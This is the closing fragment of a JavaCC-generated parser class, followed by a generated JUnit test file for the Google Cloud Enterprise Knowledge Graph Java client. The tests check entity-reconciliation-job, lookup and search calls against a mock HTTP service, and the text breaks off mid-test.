{0x0,0x0,0x0,0x0,0x10,0x0,0x10,0x0,0x0,0x20,0x20,0x40,0x20,0x0,0x0,0x10,0x0,0x10,0x0,0x0,0x10,0x0,}; final private JJCalls[] jj_2_rtns = new JJCalls[3]; private boolean jj_rescan = false; private int jj_gc = 0; public Parser(java.io.InputStream stream) { jj_input_stream = new ASCII_CharStream(stream, 1, 1); token_source = new ParserTokenManager(jj_input_stream); token = new Token(); jj_ntk = -1; jj_gen = 0; for (int i = 0; i < 22; i++) jj_la1[i] = -1; for (int i = 0; i < jj_2_rtns.length; i++) jj_2_rtns[i] = new JJCalls(); } public void ReInit(java.io.InputStream stream) { jj_input_stream.ReInit(stream, 1, 1); token_source.ReInit(jj_input_stream); token = new Token(); jj_ntk = -1; jjtree.reset(); jj_gen = 0; for (int i = 0; i < 22; i++) jj_la1[i] = -1; for (int i = 0; i < jj_2_rtns.length; i++) jj_2_rtns[i] = new JJCalls(); } public 
Parser(java.io.Reader stream) { jj_input_stream = new ASCII_CharStream(stream, 1, 1); token_source = new ParserTokenManager(jj_input_stream); token = new Token(); jj_ntk = -1; jj_gen = 0; for (int i = 0; i < 22; i++) jj_la1[i] = -1; for (int i = 0; i < jj_2_rtns.length; i++) jj_2_rtns[i] = new JJCalls(); } public void ReInit(java.io.Reader stream) { jj_input_stream.ReInit(stream, 1, 1); token_source.ReInit(jj_input_stream); token = new Token(); jj_ntk = -1; jjtree.reset(); jj_gen = 0; for (int i = 0; i < 22; i++) jj_la1[i] = -1; for (int i = 0; i < jj_2_rtns.length; i++) jj_2_rtns[i] = new JJCalls(); } public Parser(ParserTokenManager tm) { token_source = tm; token = new Token(); jj_ntk = -1; jj_gen = 0; for (int i = 0; i < 22; i++) jj_la1[i] = -1; for (int i = 0; i < jj_2_rtns.length; i++) jj_2_rtns[i] = new JJCalls(); } public void ReInit(ParserTokenManager tm) { token_source = tm; token = new Token(); jj_ntk = -1; jjtree.reset(); jj_gen = 0; for (int i = 0; i < 22; i++) jj_la1[i] = -1; for (int i = 0; i < jj_2_rtns.length; i++) jj_2_rtns[i] = new JJCalls(); } final private Token jj_consume_token(int kind) throws ParseException { Token oldToken; if ((oldToken = token).next != null) token = token.next; else token = token.next = token_source.getNextToken(); jj_ntk = -1; if (token.kind == kind) { jj_gen++; if (++jj_gc > 100) { jj_gc = 0; for (int i = 0; i < jj_2_rtns.length; i++) { JJCalls c = jj_2_rtns[i]; while (c != null) { if (c.gen < jj_gen) c.first = null; c = c.next; } } } return token; } token = oldToken; jj_kind = kind; throw generateParseException(); } final private boolean jj_scan_token(int kind) { if (jj_scanpos == jj_lastpos) { jj_la--; if (jj_scanpos.next == null) { jj_lastpos = jj_scanpos = jj_scanpos.next = token_source.getNextToken(); } else { jj_lastpos = jj_scanpos = jj_scanpos.next; } } else { jj_scanpos = jj_scanpos.next; } if (jj_rescan) { int i = 0; Token tok = token; while (tok != null && tok != jj_scanpos) { i++; tok = tok.next; } if (tok != 
null) jj_add_error_token(kind, i); } return (jj_scanpos.kind != kind); } final public Token getNextToken() { if (token.next != null) token = token.next; else token = token.next = token_source.getNextToken(); jj_ntk = -1; jj_gen++; return token; } final public Token getToken(int index) { Token t = lookingAhead ? jj_scanpos : token; for (int i = 0; i < index; i++) { if (t.next != null) t = t.next; else t = t.next = token_source.getNextToken(); } return t; } final private int jj_ntk() { if ((jj_nt=token.next) == null) return (jj_ntk = (token.next=token_source.getNextToken()).kind); else return (jj_ntk = jj_nt.kind); } private java.util.Vector<int[]> jj_expentries = new java.util.Vector<>(); private int[] jj_expentry; private int jj_kind = -1; private int[] jj_lasttokens = new int[100]; private int jj_endpos; private void jj_add_error_token(int kind, int pos) { if (pos >= 100) return; if (pos == jj_endpos + 1) { jj_lasttokens[jj_endpos++] = kind; } else if (jj_endpos != 0) { jj_expentry = new int[jj_endpos]; for (int i = 0; i < jj_endpos; i++) { jj_expentry[i] = jj_lasttokens[i]; } boolean exists = false; for (java.util.Enumeration<int[]> enumv = jj_expentries.elements(); enumv.hasMoreElements();) { int[] oldentry = enumv.nextElement(); if (oldentry.length == jj_expentry.length) { exists = true; for (int i = 0; i < jj_expentry.length; i++) { if (oldentry[i] != jj_expentry[i]) { exists = false; break; } } if (exists) break; } } if (!exists) jj_expentries.addElement(jj_expentry); if (pos != 0) jj_lasttokens[(jj_endpos = pos) - 1] = kind; } } final public ParseException generateParseException() { jj_expentries.removeAllElements(); boolean[] la1tokens = new boolean[40]; for (int i = 0; i < 40; i++) { la1tokens[i] = false; } if (jj_kind >= 0) { la1tokens[jj_kind] = true; jj_kind = -1; } for (int i = 0; i < 22; i++) { if (jj_la1[i] == jj_gen) { for (int j = 0; j < 32; j++) { if ((jj_la1_0[i] & (1<<j)) != 0) { la1tokens[j] = true; } if ((jj_la1_1[i] & (1<<j)) != 0) { 
la1tokens[32+j] = true; } } } } for (int i = 0; i < 40; i++) { if (la1tokens[i]) { jj_expentry = new int[1]; jj_expentry[0] = i; jj_expentries.addElement(jj_expentry); } } jj_endpos = 0; jj_rescan_token(); jj_add_error_token(0, 0); int[][] exptokseq = new int[jj_expentries.size()][]; for (int i = 0; i < jj_expentries.size(); i++) { exptokseq[i] = jj_expentries.elementAt(i); } return new ParseException(token, exptokseq, tokenImage); } final public void enable_tracing() { } final public void disable_tracing() { } final private void jj_rescan_token() { jj_rescan = true; for (int i = 0; i < 3; i++) { JJCalls p = jj_2_rtns[i]; do { if (p.gen > jj_gen) { jj_la = p.arg; jj_lastpos = jj_scanpos = p.first; switch (i) { case 0: jj_3_1(); break; case 1: jj_3_2(); break; case 2: jj_3_3(); break; } } p = p.next; } while (p != null); } jj_rescan = false; } final private void jj_save(int index, int xla) { JJCalls p = jj_2_rtns[index]; while (p.gen > jj_gen) { if (p.next == null) { p = p.next = new JJCalls(); break; } p = p.next; } p.gen = jj_gen + xla - jj_la; p.first = token; p.arg = xla; } static final class JJCalls { int gen; Token first; int arg; JJCalls next; } }
googleapis/google-cloud-java
35,669
java-enterpriseknowledgegraph/google-cloud-enterpriseknowledgegraph/src/test/java/com/google/cloud/enterpriseknowledgegraph/v1/EnterpriseKnowledgeGraphServiceClientHttpJsonTest.java
/*
 * Copyright 2025 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

package com.google.cloud.enterpriseknowledgegraph.v1;

import static com.google.cloud.enterpriseknowledgegraph.v1.EnterpriseKnowledgeGraphServiceClient.ListEntityReconciliationJobsPagedResponse;

import com.google.api.gax.core.NoCredentialsProvider;
import com.google.api.gax.httpjson.GaxHttpJsonProperties;
import com.google.api.gax.httpjson.testing.MockHttpService;
import com.google.api.gax.rpc.ApiClientHeaderProvider;
import com.google.api.gax.rpc.ApiException;
import com.google.api.gax.rpc.ApiExceptionFactory;
import com.google.api.gax.rpc.InvalidArgumentException;
import com.google.api.gax.rpc.StatusCode;
import com.google.api.gax.rpc.testing.FakeStatusCode;
import com.google.cloud.enterpriseknowledgegraph.v1.stub.HttpJsonEnterpriseKnowledgeGraphServiceStub;
import com.google.common.collect.Lists;
import com.google.protobuf.Empty;
import com.google.protobuf.ListValue;
import com.google.protobuf.Timestamp;
import com.google.protobuf.Value;
import com.google.rpc.Status;
import java.io.IOException;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import javax.annotation.Generated;
import org.junit.After;
import org.junit.AfterClass;
import org.junit.Assert;
import org.junit.Before;
import org.junit.BeforeClass;
import org.junit.Test;

/**
 * Machine-generated (gapic-generator-java) HTTP/JSON-transport unit tests for
 * {@code EnterpriseKnowledgeGraphServiceClient}.  Each RPC gets four tests: a
 * happy-path test and an INVALID_ARGUMENT test for the typed resource-name
 * overload, and the same pair (suffixed "2") for the plain-String overload.
 * Every happy-path test also asserts that exactly one request was sent and
 * that it carried a well-formed API-client version header.
 *
 * <p>NOTE(review): generated code — regenerate from the API definition rather
 * than hand-editing.
 */
@Generated("by gapic-generator-java")
public class EnterpriseKnowledgeGraphServiceClientHttpJsonTest {
  private static MockHttpService mockService;
  private static EnterpriseKnowledgeGraphServiceClient client;

  /** Starts one shared in-process mock HTTP service and a credential-less client wired to it. */
  @BeforeClass
  public static void startStaticServer() throws IOException {
    mockService =
        new MockHttpService(
            HttpJsonEnterpriseKnowledgeGraphServiceStub.getMethodDescriptors(),
            EnterpriseKnowledgeGraphServiceSettings.getDefaultEndpoint());
    EnterpriseKnowledgeGraphServiceSettings settings =
        EnterpriseKnowledgeGraphServiceSettings.newHttpJsonBuilder()
            .setTransportChannelProvider(
                EnterpriseKnowledgeGraphServiceSettings.defaultHttpJsonTransportProviderBuilder()
                    .setHttpTransport(mockService)
                    .build())
            .setCredentialsProvider(NoCredentialsProvider.create())
            .build();
    client = EnterpriseKnowledgeGraphServiceClient.create(settings);
  }

  @AfterClass
  public static void stopServer() {
    client.close();
  }

  @Before
  public void setUp() {}

  /** Clears queued mock responses/exceptions so tests stay independent. */
  @After
  public void tearDown() throws Exception {
    mockService.reset();
  }

  // Happy path: createEntityReconciliationJob(LocationName, job) round-trips the mocked response.
  @Test
  public void createEntityReconciliationJobTest() throws Exception {
    EntityReconciliationJob expectedResponse =
        EntityReconciliationJob.newBuilder()
            .setName(
                EntityReconciliationJobName.of(
                        "[PROJECT]", "[LOCATION]", "[ENTITY_RECONCILIATION_JOB]")
                    .toString())
            .setInputConfig(InputConfig.newBuilder().build())
            .setOutputConfig(OutputConfig.newBuilder().build())
            .setState(JobState.forNumber(0))
            .setError(Status.newBuilder().build())
            .setCreateTime(Timestamp.newBuilder().build())
            .setEndTime(Timestamp.newBuilder().build())
            .setUpdateTime(Timestamp.newBuilder().build())
            .setReconConfig(ReconConfig.newBuilder().build())
            .build();
    mockService.addResponse(expectedResponse);

    LocationName parent = LocationName.of("[PROJECT]", "[LOCATION]");
    EntityReconciliationJob entityReconciliationJob = EntityReconciliationJob.newBuilder().build();

    EntityReconciliationJob actualResponse =
        client.createEntityReconciliationJob(parent, entityReconciliationJob);
    Assert.assertEquals(expectedResponse, actualResponse);

    List<String> actualRequests = mockService.getRequestPaths();
    Assert.assertEquals(1, actualRequests.size());

    String apiClientHeaderKey =
        mockService
            .getRequestHeaders()
            .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey())
            .iterator()
            .next();
    Assert.assertTrue(
        GaxHttpJsonProperties.getDefaultApiClientHeaderPattern()
            .matcher(apiClientHeaderKey)
            .matches());
  }

  // Server-side INVALID_ARGUMENT must surface as InvalidArgumentException.
  @Test
  public void createEntityReconciliationJobExceptionTest() throws Exception {
    ApiException exception =
        ApiExceptionFactory.createException(
            new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false);
    mockService.addException(exception);

    try {
      LocationName parent = LocationName.of("[PROJECT]", "[LOCATION]");
      EntityReconciliationJob entityReconciliationJob =
          EntityReconciliationJob.newBuilder().build();
      client.createEntityReconciliationJob(parent, entityReconciliationJob);
      Assert.fail("No exception raised");
    } catch (InvalidArgumentException e) {
      // Expected exception.
    }
  }

  // Same as createEntityReconciliationJobTest but via the String-parent overload.
  @Test
  public void createEntityReconciliationJobTest2() throws Exception {
    EntityReconciliationJob expectedResponse =
        EntityReconciliationJob.newBuilder()
            .setName(
                EntityReconciliationJobName.of(
                        "[PROJECT]", "[LOCATION]", "[ENTITY_RECONCILIATION_JOB]")
                    .toString())
            .setInputConfig(InputConfig.newBuilder().build())
            .setOutputConfig(OutputConfig.newBuilder().build())
            .setState(JobState.forNumber(0))
            .setError(Status.newBuilder().build())
            .setCreateTime(Timestamp.newBuilder().build())
            .setEndTime(Timestamp.newBuilder().build())
            .setUpdateTime(Timestamp.newBuilder().build())
            .setReconConfig(ReconConfig.newBuilder().build())
            .build();
    mockService.addResponse(expectedResponse);

    String parent = "projects/project-5833/locations/location-5833";
    EntityReconciliationJob entityReconciliationJob = EntityReconciliationJob.newBuilder().build();

    EntityReconciliationJob actualResponse =
        client.createEntityReconciliationJob(parent, entityReconciliationJob);
    Assert.assertEquals(expectedResponse, actualResponse);

    List<String> actualRequests = mockService.getRequestPaths();
    Assert.assertEquals(1, actualRequests.size());

    String apiClientHeaderKey =
        mockService
            .getRequestHeaders()
            .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey())
            .iterator()
            .next();
    Assert.assertTrue(
        GaxHttpJsonProperties.getDefaultApiClientHeaderPattern()
            .matcher(apiClientHeaderKey)
            .matches());
  }

  // INVALID_ARGUMENT propagation for the String-parent overload.
  @Test
  public void createEntityReconciliationJobExceptionTest2() throws Exception {
    ApiException exception =
        ApiExceptionFactory.createException(
            new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false);
    mockService.addException(exception);

    try {
      String parent = "projects/project-5833/locations/location-5833";
      EntityReconciliationJob entityReconciliationJob =
          EntityReconciliationJob.newBuilder().build();
      client.createEntityReconciliationJob(parent, entityReconciliationJob);
      Assert.fail("No exception raised");
    } catch (InvalidArgumentException e) {
      // Expected exception.
    }
  }

  // Happy path: getEntityReconciliationJob(EntityReconciliationJobName).
  @Test
  public void getEntityReconciliationJobTest() throws Exception {
    EntityReconciliationJob expectedResponse =
        EntityReconciliationJob.newBuilder()
            .setName(
                EntityReconciliationJobName.of(
                        "[PROJECT]", "[LOCATION]", "[ENTITY_RECONCILIATION_JOB]")
                    .toString())
            .setInputConfig(InputConfig.newBuilder().build())
            .setOutputConfig(OutputConfig.newBuilder().build())
            .setState(JobState.forNumber(0))
            .setError(Status.newBuilder().build())
            .setCreateTime(Timestamp.newBuilder().build())
            .setEndTime(Timestamp.newBuilder().build())
            .setUpdateTime(Timestamp.newBuilder().build())
            .setReconConfig(ReconConfig.newBuilder().build())
            .build();
    mockService.addResponse(expectedResponse);

    EntityReconciliationJobName name =
        EntityReconciliationJobName.of("[PROJECT]", "[LOCATION]", "[ENTITY_RECONCILIATION_JOB]");

    EntityReconciliationJob actualResponse = client.getEntityReconciliationJob(name);
    Assert.assertEquals(expectedResponse, actualResponse);

    List<String> actualRequests = mockService.getRequestPaths();
    Assert.assertEquals(1, actualRequests.size());

    String apiClientHeaderKey =
        mockService
            .getRequestHeaders()
            .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey())
            .iterator()
            .next();
    Assert.assertTrue(
        GaxHttpJsonProperties.getDefaultApiClientHeaderPattern()
            .matcher(apiClientHeaderKey)
            .matches());
  }

  // INVALID_ARGUMENT propagation for getEntityReconciliationJob(name).
  @Test
  public void getEntityReconciliationJobExceptionTest() throws Exception {
    ApiException exception =
        ApiExceptionFactory.createException(
            new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false);
    mockService.addException(exception);

    try {
      EntityReconciliationJobName name =
          EntityReconciliationJobName.of("[PROJECT]", "[LOCATION]", "[ENTITY_RECONCILIATION_JOB]");
      client.getEntityReconciliationJob(name);
      Assert.fail("No exception raised");
    } catch (InvalidArgumentException e) {
      // Expected exception.
    }
  }

  // Happy path: getEntityReconciliationJob(String name).
  @Test
  public void getEntityReconciliationJobTest2() throws Exception {
    EntityReconciliationJob expectedResponse =
        EntityReconciliationJob.newBuilder()
            .setName(
                EntityReconciliationJobName.of(
                        "[PROJECT]", "[LOCATION]", "[ENTITY_RECONCILIATION_JOB]")
                    .toString())
            .setInputConfig(InputConfig.newBuilder().build())
            .setOutputConfig(OutputConfig.newBuilder().build())
            .setState(JobState.forNumber(0))
            .setError(Status.newBuilder().build())
            .setCreateTime(Timestamp.newBuilder().build())
            .setEndTime(Timestamp.newBuilder().build())
            .setUpdateTime(Timestamp.newBuilder().build())
            .setReconConfig(ReconConfig.newBuilder().build())
            .build();
    mockService.addResponse(expectedResponse);

    String name =
        "projects/project-4188/locations/location-4188/entityReconciliationJobs/entityReconciliationJob-4188";

    EntityReconciliationJob actualResponse = client.getEntityReconciliationJob(name);
    Assert.assertEquals(expectedResponse, actualResponse);

    List<String> actualRequests = mockService.getRequestPaths();
    Assert.assertEquals(1, actualRequests.size());

    String apiClientHeaderKey =
        mockService
            .getRequestHeaders()
            .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey())
            .iterator()
            .next();
    Assert.assertTrue(
        GaxHttpJsonProperties.getDefaultApiClientHeaderPattern()
            .matcher(apiClientHeaderKey)
            .matches());
  }

  // INVALID_ARGUMENT propagation for getEntityReconciliationJob(String).
  @Test
  public void getEntityReconciliationJobExceptionTest2() throws Exception {
    ApiException exception =
        ApiExceptionFactory.createException(
            new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false);
    mockService.addException(exception);

    try {
      String name =
          "projects/project-4188/locations/location-4188/entityReconciliationJobs/entityReconciliationJob-4188";
      client.getEntityReconciliationJob(name);
      Assert.fail("No exception raised");
    } catch (InvalidArgumentException e) {
      // Expected exception.
    }
  }

  // Happy path: listEntityReconciliationJobs pages through a one-element response.
  @Test
  public void listEntityReconciliationJobsTest() throws Exception {
    EntityReconciliationJob responsesElement = EntityReconciliationJob.newBuilder().build();
    ListEntityReconciliationJobsResponse expectedResponse =
        ListEntityReconciliationJobsResponse.newBuilder()
            .setNextPageToken("")
            .addAllEntityReconciliationJobs(Arrays.asList(responsesElement))
            .build();
    mockService.addResponse(expectedResponse);

    LocationName parent = LocationName.of("[PROJECT]", "[LOCATION]");

    ListEntityReconciliationJobsPagedResponse pagedListResponse =
        client.listEntityReconciliationJobs(parent);

    List<EntityReconciliationJob> resources = Lists.newArrayList(pagedListResponse.iterateAll());

    Assert.assertEquals(1, resources.size());
    Assert.assertEquals(
        expectedResponse.getEntityReconciliationJobsList().get(0), resources.get(0));

    List<String> actualRequests = mockService.getRequestPaths();
    Assert.assertEquals(1, actualRequests.size());

    String apiClientHeaderKey =
        mockService
            .getRequestHeaders()
            .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey())
            .iterator()
            .next();
    Assert.assertTrue(
        GaxHttpJsonProperties.getDefaultApiClientHeaderPattern()
            .matcher(apiClientHeaderKey)
            .matches());
  }

  // INVALID_ARGUMENT propagation for listEntityReconciliationJobs(LocationName).
  @Test
  public void listEntityReconciliationJobsExceptionTest() throws Exception {
    ApiException exception =
        ApiExceptionFactory.createException(
            new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false);
    mockService.addException(exception);

    try {
      LocationName parent = LocationName.of("[PROJECT]", "[LOCATION]");
      client.listEntityReconciliationJobs(parent);
      Assert.fail("No exception raised");
    } catch (InvalidArgumentException e) {
      // Expected exception.
    }
  }

  // Happy path: listEntityReconciliationJobs via the String-parent overload.
  @Test
  public void listEntityReconciliationJobsTest2() throws Exception {
    EntityReconciliationJob responsesElement = EntityReconciliationJob.newBuilder().build();
    ListEntityReconciliationJobsResponse expectedResponse =
        ListEntityReconciliationJobsResponse.newBuilder()
            .setNextPageToken("")
            .addAllEntityReconciliationJobs(Arrays.asList(responsesElement))
            .build();
    mockService.addResponse(expectedResponse);

    String parent = "projects/project-5833/locations/location-5833";

    ListEntityReconciliationJobsPagedResponse pagedListResponse =
        client.listEntityReconciliationJobs(parent);

    List<EntityReconciliationJob> resources = Lists.newArrayList(pagedListResponse.iterateAll());

    Assert.assertEquals(1, resources.size());
    Assert.assertEquals(
        expectedResponse.getEntityReconciliationJobsList().get(0), resources.get(0));

    List<String> actualRequests = mockService.getRequestPaths();
    Assert.assertEquals(1, actualRequests.size());

    String apiClientHeaderKey =
        mockService
            .getRequestHeaders()
            .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey())
            .iterator()
            .next();
    Assert.assertTrue(
        GaxHttpJsonProperties.getDefaultApiClientHeaderPattern()
            .matcher(apiClientHeaderKey)
            .matches());
  }

  // INVALID_ARGUMENT propagation for listEntityReconciliationJobs(String).
  @Test
  public void listEntityReconciliationJobsExceptionTest2() throws Exception {
    ApiException exception =
        ApiExceptionFactory.createException(
            new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false);
    mockService.addException(exception);

    try {
      String parent = "projects/project-5833/locations/location-5833";
      client.listEntityReconciliationJobs(parent);
      Assert.fail("No exception raised");
    } catch (InvalidArgumentException e) {
      // Expected exception.
    }
  }

  // Happy path: cancelEntityReconciliationJob(EntityReconciliationJobName) — void RPC (Empty).
  @Test
  public void cancelEntityReconciliationJobTest() throws Exception {
    Empty expectedResponse = Empty.newBuilder().build();
    mockService.addResponse(expectedResponse);

    EntityReconciliationJobName name =
        EntityReconciliationJobName.of("[PROJECT]", "[LOCATION]", "[ENTITY_RECONCILIATION_JOB]");

    client.cancelEntityReconciliationJob(name);

    List<String> actualRequests = mockService.getRequestPaths();
    Assert.assertEquals(1, actualRequests.size());

    String apiClientHeaderKey =
        mockService
            .getRequestHeaders()
            .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey())
            .iterator()
            .next();
    Assert.assertTrue(
        GaxHttpJsonProperties.getDefaultApiClientHeaderPattern()
            .matcher(apiClientHeaderKey)
            .matches());
  }

  // INVALID_ARGUMENT propagation for cancelEntityReconciliationJob(name).
  @Test
  public void cancelEntityReconciliationJobExceptionTest() throws Exception {
    ApiException exception =
        ApiExceptionFactory.createException(
            new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false);
    mockService.addException(exception);

    try {
      EntityReconciliationJobName name =
          EntityReconciliationJobName.of("[PROJECT]", "[LOCATION]", "[ENTITY_RECONCILIATION_JOB]");
      client.cancelEntityReconciliationJob(name);
      Assert.fail("No exception raised");
    } catch (InvalidArgumentException e) {
      // Expected exception.
    }
  }

  // Happy path: cancelEntityReconciliationJob(String name).
  @Test
  public void cancelEntityReconciliationJobTest2() throws Exception {
    Empty expectedResponse = Empty.newBuilder().build();
    mockService.addResponse(expectedResponse);

    String name =
        "projects/project-4188/locations/location-4188/entityReconciliationJobs/entityReconciliationJob-4188";

    client.cancelEntityReconciliationJob(name);

    List<String> actualRequests = mockService.getRequestPaths();
    Assert.assertEquals(1, actualRequests.size());

    String apiClientHeaderKey =
        mockService
            .getRequestHeaders()
            .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey())
            .iterator()
            .next();
    Assert.assertTrue(
        GaxHttpJsonProperties.getDefaultApiClientHeaderPattern()
            .matcher(apiClientHeaderKey)
            .matches());
  }

  // INVALID_ARGUMENT propagation for cancelEntityReconciliationJob(String).
  @Test
  public void cancelEntityReconciliationJobExceptionTest2() throws Exception {
    ApiException exception =
        ApiExceptionFactory.createException(
            new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false);
    mockService.addException(exception);

    try {
      String name =
          "projects/project-4188/locations/location-4188/entityReconciliationJobs/entityReconciliationJob-4188";
      client.cancelEntityReconciliationJob(name);
      Assert.fail("No exception raised");
    } catch (InvalidArgumentException e) {
      // Expected exception.
    }
  }

  // Happy path: deleteEntityReconciliationJob(EntityReconciliationJobName) — void RPC (Empty).
  @Test
  public void deleteEntityReconciliationJobTest() throws Exception {
    Empty expectedResponse = Empty.newBuilder().build();
    mockService.addResponse(expectedResponse);

    EntityReconciliationJobName name =
        EntityReconciliationJobName.of("[PROJECT]", "[LOCATION]", "[ENTITY_RECONCILIATION_JOB]");

    client.deleteEntityReconciliationJob(name);

    List<String> actualRequests = mockService.getRequestPaths();
    Assert.assertEquals(1, actualRequests.size());

    String apiClientHeaderKey =
        mockService
            .getRequestHeaders()
            .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey())
            .iterator()
            .next();
    Assert.assertTrue(
        GaxHttpJsonProperties.getDefaultApiClientHeaderPattern()
            .matcher(apiClientHeaderKey)
            .matches());
  }

  // INVALID_ARGUMENT propagation for deleteEntityReconciliationJob(name).
  @Test
  public void deleteEntityReconciliationJobExceptionTest() throws Exception {
    ApiException exception =
        ApiExceptionFactory.createException(
            new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false);
    mockService.addException(exception);

    try {
      EntityReconciliationJobName name =
          EntityReconciliationJobName.of("[PROJECT]", "[LOCATION]", "[ENTITY_RECONCILIATION_JOB]");
      client.deleteEntityReconciliationJob(name);
      Assert.fail("No exception raised");
    } catch (InvalidArgumentException e) {
      // Expected exception.
    }
  }

  // Happy path: deleteEntityReconciliationJob(String name).
  @Test
  public void deleteEntityReconciliationJobTest2() throws Exception {
    Empty expectedResponse = Empty.newBuilder().build();
    mockService.addResponse(expectedResponse);

    String name =
        "projects/project-4188/locations/location-4188/entityReconciliationJobs/entityReconciliationJob-4188";

    client.deleteEntityReconciliationJob(name);

    List<String> actualRequests = mockService.getRequestPaths();
    Assert.assertEquals(1, actualRequests.size());

    String apiClientHeaderKey =
        mockService
            .getRequestHeaders()
            .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey())
            .iterator()
            .next();
    Assert.assertTrue(
        GaxHttpJsonProperties.getDefaultApiClientHeaderPattern()
            .matcher(apiClientHeaderKey)
            .matches());
  }

  // INVALID_ARGUMENT propagation for deleteEntityReconciliationJob(String).
  @Test
  public void deleteEntityReconciliationJobExceptionTest2() throws Exception {
    ApiException exception =
        ApiExceptionFactory.createException(
            new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false);
    mockService.addException(exception);

    try {
      String name =
          "projects/project-4188/locations/location-4188/entityReconciliationJobs/entityReconciliationJob-4188";
      client.deleteEntityReconciliationJob(name);
      Assert.fail("No exception raised");
    } catch (InvalidArgumentException e) {
      // Expected exception.
    }
  }

  // Happy path: lookup(LocationName, ids) round-trips the mocked LookupResponse.
  @Test
  public void lookupTest() throws Exception {
    LookupResponse expectedResponse =
        LookupResponse.newBuilder()
            .setContext(Value.newBuilder().setBoolValue(true).build())
            .setType(Value.newBuilder().setBoolValue(true).build())
            .setItemListElement(ListValue.newBuilder().build())
            .build();
    mockService.addResponse(expectedResponse);

    LocationName parent = LocationName.of("[PROJECT]", "[LOCATION]");
    List<String> ids = new ArrayList<>();

    LookupResponse actualResponse = client.lookup(parent, ids);
    Assert.assertEquals(expectedResponse, actualResponse);

    List<String> actualRequests = mockService.getRequestPaths();
    Assert.assertEquals(1, actualRequests.size());

    String apiClientHeaderKey =
        mockService
            .getRequestHeaders()
            .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey())
            .iterator()
            .next();
    Assert.assertTrue(
        GaxHttpJsonProperties.getDefaultApiClientHeaderPattern()
            .matcher(apiClientHeaderKey)
            .matches());
  }

  // INVALID_ARGUMENT propagation for lookup(LocationName, ids).
  @Test
  public void lookupExceptionTest() throws Exception {
    ApiException exception =
        ApiExceptionFactory.createException(
            new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false);
    mockService.addException(exception);

    try {
      LocationName parent = LocationName.of("[PROJECT]", "[LOCATION]");
      List<String> ids = new ArrayList<>();
      client.lookup(parent, ids);
      Assert.fail("No exception raised");
    } catch (InvalidArgumentException e) {
      // Expected exception.
    }
  }

  // Happy path: lookup via the String-parent overload.
  @Test
  public void lookupTest2() throws Exception {
    LookupResponse expectedResponse =
        LookupResponse.newBuilder()
            .setContext(Value.newBuilder().setBoolValue(true).build())
            .setType(Value.newBuilder().setBoolValue(true).build())
            .setItemListElement(ListValue.newBuilder().build())
            .build();
    mockService.addResponse(expectedResponse);

    String parent = "projects/project-5833/locations/location-5833";
    List<String> ids = new ArrayList<>();

    LookupResponse actualResponse = client.lookup(parent, ids);
    Assert.assertEquals(expectedResponse, actualResponse);

    List<String> actualRequests = mockService.getRequestPaths();
    Assert.assertEquals(1, actualRequests.size());

    String apiClientHeaderKey =
        mockService
            .getRequestHeaders()
            .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey())
            .iterator()
            .next();
    Assert.assertTrue(
        GaxHttpJsonProperties.getDefaultApiClientHeaderPattern()
            .matcher(apiClientHeaderKey)
            .matches());
  }

  // INVALID_ARGUMENT propagation for lookup(String, ids).
  @Test
  public void lookupExceptionTest2() throws Exception {
    ApiException exception =
        ApiExceptionFactory.createException(
            new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false);
    mockService.addException(exception);

    try {
      String parent = "projects/project-5833/locations/location-5833";
      List<String> ids = new ArrayList<>();
      client.lookup(parent, ids);
      Assert.fail("No exception raised");
    } catch (InvalidArgumentException e) {
      // Expected exception.
    }
  }

  // Happy path: search(LocationName, query) round-trips the mocked SearchResponse.
  @Test
  public void searchTest() throws Exception {
    SearchResponse expectedResponse =
        SearchResponse.newBuilder()
            .setContext(Value.newBuilder().setBoolValue(true).build())
            .setType(Value.newBuilder().setBoolValue(true).build())
            .setItemListElement(ListValue.newBuilder().build())
            .build();
    mockService.addResponse(expectedResponse);

    LocationName parent = LocationName.of("[PROJECT]", "[LOCATION]");
    String query = "query107944136";

    SearchResponse actualResponse = client.search(parent, query);
    Assert.assertEquals(expectedResponse, actualResponse);

    List<String> actualRequests = mockService.getRequestPaths();
    Assert.assertEquals(1, actualRequests.size());

    String apiClientHeaderKey =
        mockService
            .getRequestHeaders()
            .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey())
            .iterator()
            .next();
    Assert.assertTrue(
        GaxHttpJsonProperties.getDefaultApiClientHeaderPattern()
            .matcher(apiClientHeaderKey)
            .matches());
  }

  // INVALID_ARGUMENT propagation for search(LocationName, query).
  @Test
  public void searchExceptionTest() throws Exception {
    ApiException exception =
        ApiExceptionFactory.createException(
            new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false);
